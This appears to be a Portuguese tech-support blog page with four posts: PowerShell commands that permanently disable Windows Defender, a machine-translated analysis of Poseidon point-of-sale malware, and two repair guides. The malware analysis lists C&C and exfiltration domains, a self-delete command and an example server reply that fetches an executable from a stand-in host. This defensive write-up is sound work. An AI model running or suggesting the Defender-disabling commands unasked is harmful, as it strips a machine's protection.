Mostrando postagens com marcador Antivírus. Mostrar todas as postagens

domingo, 29 de maio de 2022

Como desativar o Windows Defender no Windows 11 ou 10

 Como desativar o Windows Defender no Windows 10 ou 11

Não é recomendado a desativação do Windows Defender, mas se você precisar realizar esse processo, basta seguir os passos abaixo:

1. Abrir o PowerShell como Administrador;


2 Copiar os comandos abaixo e executar no powershell:

  • Set-MpPreference -DisableRealtimeMonitoring $true -Force
  • New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'DisableAntiSpyware' -Value 1 -PropertyType DWord -Force
  • New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'DisableAntiVirus' -Value 1 -PropertyType DWord -Force
  • New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name 'ServiceKeepAlive' -Value 0 -PropertyType DWord -Force
3 Colar no terminal do Powershell e pressionar a tecla {Enter}





Pronto, o Microsoft Defender Antivírus foi desativado  permanentemente e ele não será mais executado.


 
Mas se vc quiser desativar 

Atenção! Com isso, seu computador não está mais protegido, ele não verificará e nem vai fazer busca por malware ou software potencialmente indesejado.
By às Nenhum comentário: Marcadores: , , , , ,

sexta-feira, 19 de fevereiro de 2016

Saiba tudo sobre o Poseidon - A Terrível Ameaça do Varejista

Recentemente um novo tipo ameaças, de codinome Poseidon, vem tirando o sono de muitos empresários no mundo afora, principalmente os responsáveis por redes de varejistas. Essa ameaça é conhecida por roubar informações nos sistemas de ponto de venda (PDV) no momento da utilização de cartões de credito.

No texto abaixo, adaptado do site blogs.cisco, você vai conhecer com mais detalhes o funcionamento do terrível Poseidon


 A Ameaça Poseidon

Quando os consumidores fazem compras de um varejista, a transação é processada através de sistemas de ponto-de-venda (PDV). Quando um cartão de crédito ou de débito, é utilizado um sistema de POS é utilizado para ler a informação armazenada na fita magnética no verso do cartão de crédito. Uma vez que esta informação é roubado a partir de um comerciante, ele pode ser codificado numa fita magnética e usado por um novo cartão. 
Existem os "mercado negro" para comprar estas informações valiosa, porque os atacantes são capazes de rentabilizar facilmente os dados do cartão de crédito roubado. Incidentes envolvendo PoS Malwares têm vindo a aumentar, afetando muitas grandes organizações, bem como estabelecimentos de mom-and-pop pequenas e ganhando um monte de atenção da mídia. A presença de grandes quantidades de informação financeira e pessoal garante que essas empresas e seus sistemas de POS de varejo permanecerá alvos atraentes.
image14

Visão geral

Há uma nova família de Malware visando sistemas de POS, infectando máquinas para pegar dados na memória com informações de cartão de crédito e enviar esses dados para servidores, também TLD principalmente os da .ru, para a colheita e provavelmente revenda. Esta nova família de Malware, que já apelidado de Poseidon, tem alguns componentes para ele, como ilustra o diagrama abaixo:
PoSeidonimage10
Em um nível alto, ele começa carregando um arquivo binário que ao ser executado tentará primeiro se manter na máquina de destino, a fim de sobreviver a uma possível reinicialização do sistema. Ao carregar ele se conectar com um servidor, que faz todo o gerenciamento das requisições, passando uma URL que contém um outro binário para baixar e executar as informações coletada. 
O binário baixado, FINDSTR , instala um keylogger e verifica a memória do dispositivo POS para sequências de números que podem ser números de cartão de crédito.Após a verificação de que os números estão em números de cartão de crédito, teclas e números de cartão de crédito são codificados e enviados para um servidor exfiltração.

Detalhes técnicos

Keylogger

O arquivo com SHA256 334079dc9fa5b06fbd68e81de903fcd4e356b4f2d0e8bbd6bdca7891786c39d4 talvez pudesse estar na origem do compromisso sistema POS. Chamamos isso de KeyLogger arquivo com base em informações de depuração encontrado no binário:

Após a execução, este arquivo se copia para tanto %SystemRoot%\system32\<filename>.exe ou %UserProfile%\<filename>.exe e adiciona entrada de registo sob HKLM (ou HKCU)\Software\Microsoft\Windows\CurrentVersion\Run .
O arquivo também abre HKCU\Software\LogMeIn Ignition e enumera as chaves para a chave de sub-conta, abre-e exclui o PasswordTicket Valor e obtém o Email Value. Também exclui árvore de registroHKCU\Software\LogMeIn Ignition\<key>\Profiles \ * .
O arquivo envia a um servidor exfiltration por postar dados para um desses URIs:
  • wondertechmy[.]com/pes/viewtopic.php
  • wondertechmy [.] ru / pes / viewtopic.php
  • wondwondnew [.] ru / pes / viewtopic.php
 O formato é de URI
uid =% I64u & ganhar =% d.% d & vers =% s
O componente Keylogger foi potencialmente usado para roubar senhas e poderia ter sido o vetor de infecção inicial.

Carregador

O carregador para o malware Poseidon PoS recebe o nome de depuração informações encontradas no binário:
PoSeidonimage08
Após a ser executado, carregador verifica para ver se ele está sendo executado com um desses dois nomes de arquivo:
  • WinHost.exe
  • WinHost32.exe
Se não estiver, ele irá certificar-se de que nenhum serviço Windows está sendo executado com o nome WinHost. Carregador vai se copiar para % SystemRoot% \ System32 \ WinHost.exe , substituindo qualquer arquivo nesse local que iria acontecer de ter o mesmo nome. Em seguida, carregador vai iniciar um serviço chamado WinHost.
PoSeidonimage13
Isto é feito para que ele permaneça em execução na memória mesmo se o usuário atual efetue logoff.Se carregador não é capaz de instalar-se como um serviço, ele vai tentar encontrar outras instâncias de si mesmo em execução na memória e finalizá-las. Posteriormente, ele vai se copiar para % UserProfile% \ WinHost32.exe e instalar a chave do Registro HKCU \ Microsoft \ Windows \ CurrentVersion \ Run \\ WinHost32 . Finalmente, ele irá criar um novo processo para executar % UserProfile% \ WinHost32.exe .
Agora que a persistência foi alcançado, carregador irá apagar-se, executando o seguinte comando:
  • cmd.exe / c del <path_to_itself> >> NUL
A instância do carregador funcionando em tentativa de memória para ler dados de configuração em % SystemRoot% \ System32 \ WinHost.exe.cfg . Este arquivo pode conter uma lista de URLs para ser adicionado a uma lista de URLs codificados já contida no carregador .
Loader então tenta entrar em contato com um dos servidores codificado C & C:
image00
  • linturefa.com
  • xablopefgr.com
  • tabidzuwek.com
  • lacdileftre.ru
  • tabidzuwek.com
  • xablopefgr.com
  • lacdileftre.ru
  • weksrubaz.ru
  • linturefa.ru
  • mifastubiv.ru
  • xablopefgr.ru
  • tabidzuwek.ru
Os endereços IP associados:
  • 151.236.11.167
  • 185.13.32.132
  • 185.13.32.48
  • Redigido a pedido da Lei Federal Enforcement
  • 31.184.192.196
  • 91.220.131.116
  • 91.220.131.87
Se um dos domínios acima resolver para um endereço IP de um HTTP POST é feita usando a seguinte string user-agent:
Mozilla / 4.0 (compatível; MSIE 8.0; Windows NT 6.1; Trident / 4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

dados POST é enviada para qualquer um:
    • <IP ADDRESS>/ldl01/viewtopic.php
    • <Endereço IP> /pes2/viewtopic.php

dados POST segue o formato:
uid =% I64u & uinfo =% s & ganhar =% d.% d & bits =% d & vers =% s & construir =% s
PoSeidonimage12
Carregador espera que a seguinte resposta do servidor C & C:
{<CommandLetter>: <ArgumentString>}
Exemplo de resposta:
  • {R:http://badguy.com/malwarefilename.exe}
  • {b:pes13n|373973303|https://01.220.131.116/ldl01/files/pes13n.exe}
PoSeidonimage04
É por buscar e executar o executável referenciado na resposta do servidor que a segunda parte da Poseidon encontra o seu caminho para o dispositivo de PoS.

fINDSTR

O carregador para o malware Poseidon PoS recebe o nome de depuração informações encontradas no binário:

image04
Um PE embutido é extraído através shellcode e execução continua com o binário incorporado. Este arquivo instala um keylogger mínima que é implementado de forma semelhante à descrição encontradaaqui . Os dados interceptados por este keylogger será posteriormente enviado para um servidor de exfiltração.
O PE, em seguida, percorre todos os processos em execução no dispositivo PoS a olhar para processos com um token de segurança não associado com o "NT AUTHORITY" nome de domínio. Ele itera através de todas as páginas de leitura / escrita dentro desses processos para informações sobre os cartões de crédito.
O malware procura somente sequências de números que começam com:
  • 6, 5, 4, com um comprimento de 16 dígitos (Discover, Visa, Mastercard)
  • 3 com um comprimento de 15 dígitos (American Express)

Em seguida, ele usa o algoritmo Luhn para verificar que os números são realmente números de cartão de crédito ou de débito, como mostrado pelo segmento de código abaixo:
PoSeidonimage02
Em seguida, a resolução de DNS é tentada para os domínios abaixo. Estes são alguns dos servidores exfiltração dados conhecidos:
  • quartlet.com
  • horticartf.com
  • kilaxuntf.ru
  • dreplicag.ru
  • fimzusoln.ru
  • wetguqan.ru
Se um dos domínios acima resolver para um endereço IP de um HTTP POST é feita usando a seguinte string user-agent:
Mozilla / 4.0 (compatível; MSIE 8.0; Windows NT 6.1; Trident / 4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
dados POST é enviada para:
<Endereço IP> /pes13/viewtopic.php
image11
Dados segue o seguinte formato:
oprat = 2 & uid =% I64u & uinfo =% s & ganhar =% d.% d & vers =% s
image12

Dados opcionais POST (dados: números de cartão de crédito, registros de dados: keylogger)
e dados = <XORed_with_0x2A_then_base64_data_unk> 
& registra = <XORed_with_0x2A_then_base64_data_unk>

números de cartão de crédito e dados keylogger é enviado para o servidor exfiltration depois de ser XORed e base64 codificado.
A resposta esperar do servidor exfiltração é:
Este mecanismo permite que o malware se atualizar, com base em comandos recebidos do servidor exfiltração.

Loader vs FINDSTR

PoSeidonimage01
Comparando uma cópia descompactada de carregador versão 11.4 a uma cópia descompactada deFINDSTR versão 7.1 com bindiff mostra que 62% da funcionalidade em ambas as amostras é o mesmo.Os atores por trás desse malware provavelmente desenvolveu algumas funcionalidades core e compilado-lo em uma biblioteca para ser utilizado por outros projetos que estão em desenvolvimento.

 COI

image09
Clique para Endpoint COI Versão
domínios
  • linturefa.com
  • xablopefgr.com
  • tabidzuwek.com
  • linturefa.ru
  • xablopefgr.ru
  • tabidzuwek.ru
  • weksrubaz.ru
  • mifastubiv.ru
  • lacdileftre.ru
  • quartlet.com
  • horticartf.com
  • kilaxuntf.ru
  • dreplicag.ru
  • fimzusoln.ru
  • wetguqan.ru
 Endereços IP:
  • 151.236.11.167
  • 185.13.32.132
  • 185.13.32.48
  • Redigido a pedido da Lei Federal Enforcement
  • 31.184.192.196
  • 91.220.131.116
  • 91.220.131.87
  • Redigido a pedido da Lei Federal Enforcement
Conclusão
Poseidon é outro no número crescente de sistemas de POS malwares Point-of-Sale segmentação que demonstram as técnicas e abordagens de autores de malware sofisticados. Atacantes vai continuar a orientar os sistemas de POS e empregam várias técnicas de ofuscação em uma tentativa de evitar a detecção. Enquanto ataques PoS continuar a proporcionar retornos, os atacantes vão continuar a investir em inovação e desenvolvimento de novas famílias de malware. Os administradores de rede terá de permanecer vigilantes e aderir às melhores práticas da indústria para garantir a cobertura e proteção contra o avanço ameaças de malware.
Regras do Snort: 33836-33852. Por favor, consulte Centro de Defesa ou FireSight console de gerenciamento para obter informações atualizadas.
Protegendo os usuários contra essas ameaças
image06
Nós encorajamos as organizações a considerar as melhores práticas de segurança, começando com uma abordagem ameaça-centric. Dado o cenário de ameaças dinâmico, defendemos essa abordagem ameaça-centric e operacionalizado que implementa proteções em toda a rede estendida - e em todo o continuum de ataque total - antes, durante e depois de um ataque. Esta abordagem está baseado em visibilidade superior, controle contínuo e proteção avançada contra ameaças em toda a rede estendida e todo o contínuo ataque


By às Nenhum comentário: Marcadores: ,

segunda-feira, 6 de abril de 2015

Computador criando atalhos e ocultando pastas

Análise do registro
A máquina do cliente estava exibindo uma mensagem de execução de script continuamente e criava atalhos e pastas ocultas. Vide na imagem abaixo:







Verificamos que o arquivo “qdrpnfuy.js”, descrito na imagem acima, tinha associação com o JS.Proslikefan.B. O JS.Proslikefan.B é um worm que se espalha através de JavaScript e unidades removíveis. Ele também pode baixar arquivos adicionais e roubar informações no host infectado.

Ao ser executado, uma das características do worm é copiar-se para os seguintes locais:
· % DRIVELETTER%:. \ trashes \ [valor calculado] \ [valor calculado] .js
· % USERPROFILE% \ Local Settings \ Temp \ [valor calculado] .js
· % UserProfile% \ [valor calculado] .js
· % USERPROFILE% \ AppData \ Roaming \ [valor calculado] .js

Na máquina infectada o caminho escolhido foi: %USERPROFILE%\AppData\Roaming\skkyww\ qdrpnfuy.js.

Causa do problema
Nesse caso, a máquina em questão não acessa a internet. O worm foi transmitido através de Pen Drive já infectado. O Antivírus instalado na máquina não detectou o worm porque estava desatualizado.Solução
Solução
O problema foi resolvido apagando todos os arquivos relacionados ao WORM e em seguida aplicamos a seguinte solução no pendrive:

1. Plugar o Pen drive em uma máquina e executar o Antivírus direto no pen driver;
2. Abrir o prompt de comando como Administrador, clicar em Iniciar e escrever "CMD.exe" clicar com o lado direito do mouse e escolher a opção "Executar como Administrador"
3. No prompt de comando, escrever: attrib -h -r -s /s /d X:\*.*

Vide imagem abaixo:
Você deve substituindo o X pela letra que está representando seu pen driver no computador.

By às Marcadores: , ,

quarta-feira, 27 de agosto de 2014

Solução - Erro aswrvrt.sys 0x00000000ed - C:\Windows\System32\drivers\aswrvrt.sys

O problema


Alguns usuários estão reclamando que após uma atualização do antivírus "Avast" sua máquina apresentou problema na inicialização, e estão recebendo uma mensagem de erro "0x00000000ed" para carregar o arquivo C:\Windows\System32\drivers\aswrvrt.sys. 

O erro ocorre também nos modos: "Modo de segurança", "Modo de segurança com rede", "Modo de segurança com prompt de comando" ou "Última configuração válida", todas essas opções falharam. No modo restauração do sistema, pressionando a tecla "F8", funciona; mas só mostra o ponteiro do mouse e o sistema não inicializa. 

Análise do problema

O problema está relacionado com o arquivo Aswrvrt.sys; ele que está causado a falha na inicialização. Erros no arquivo Aswrvrt.sys "0x00000000ed" está muitas vezes relacionado com problemas de disco rígido, setores defeituosos, folha na alimentação, problema no cabo de dados...
 
 Solução
Se seu equipamento for um Lenovo:
 

1. Ligue o Notebook e pressione "F1" para entrar no Setup;

2. Selecione a opção "Config";

3. Escolha agora a opção "Serial ATA (SATA)";

4. Em "SATA Controller Mode Option:" altere o valor para "compatibility" e pressionando "F5 ou F6"

5. Saia do Setup pressionando "F10", selecione a opção "Yes" para salvar as alterações.


Para outras marcas:
Basta entrar no "Setup" e selecione a opção "LOAD BIOS DEFAULTS", salvar e sair.

Exemplo:

Ligar o computador e pressiona no seu teclado a tecla: "DEL" ou "F12"
 A tecla para entrar no "Setup" pode vaviar de acordo com o fabricante: "F8", "Esc", "F11" "DEL"...



Ok, agora será exibido sua área trabalho:


1. Pressionar no seu teclado as teclas: Windows + R (Tecla que tem uma bandeirinha do Windows + a letra R);

2. Na janela "Executar Como", escreva: "CMD" e pressione "Ok";

3. Execute o comando: CHKDSK /R e pressione a tecla "Enter";

4. Execute o também o comando: SFC /SCANNOW e pressione a tecla "Enter".



Deve demorar um pouco, Aguarde...

Caso não resolva, reinicialize a máquina e escolha a opção "Last known good Configuration"(Ultima configuração válida) para remover ou desativar programas e drivers que foram instalados recentemente.
By às Nenhum comentário: Marcadores: , , , , , , ,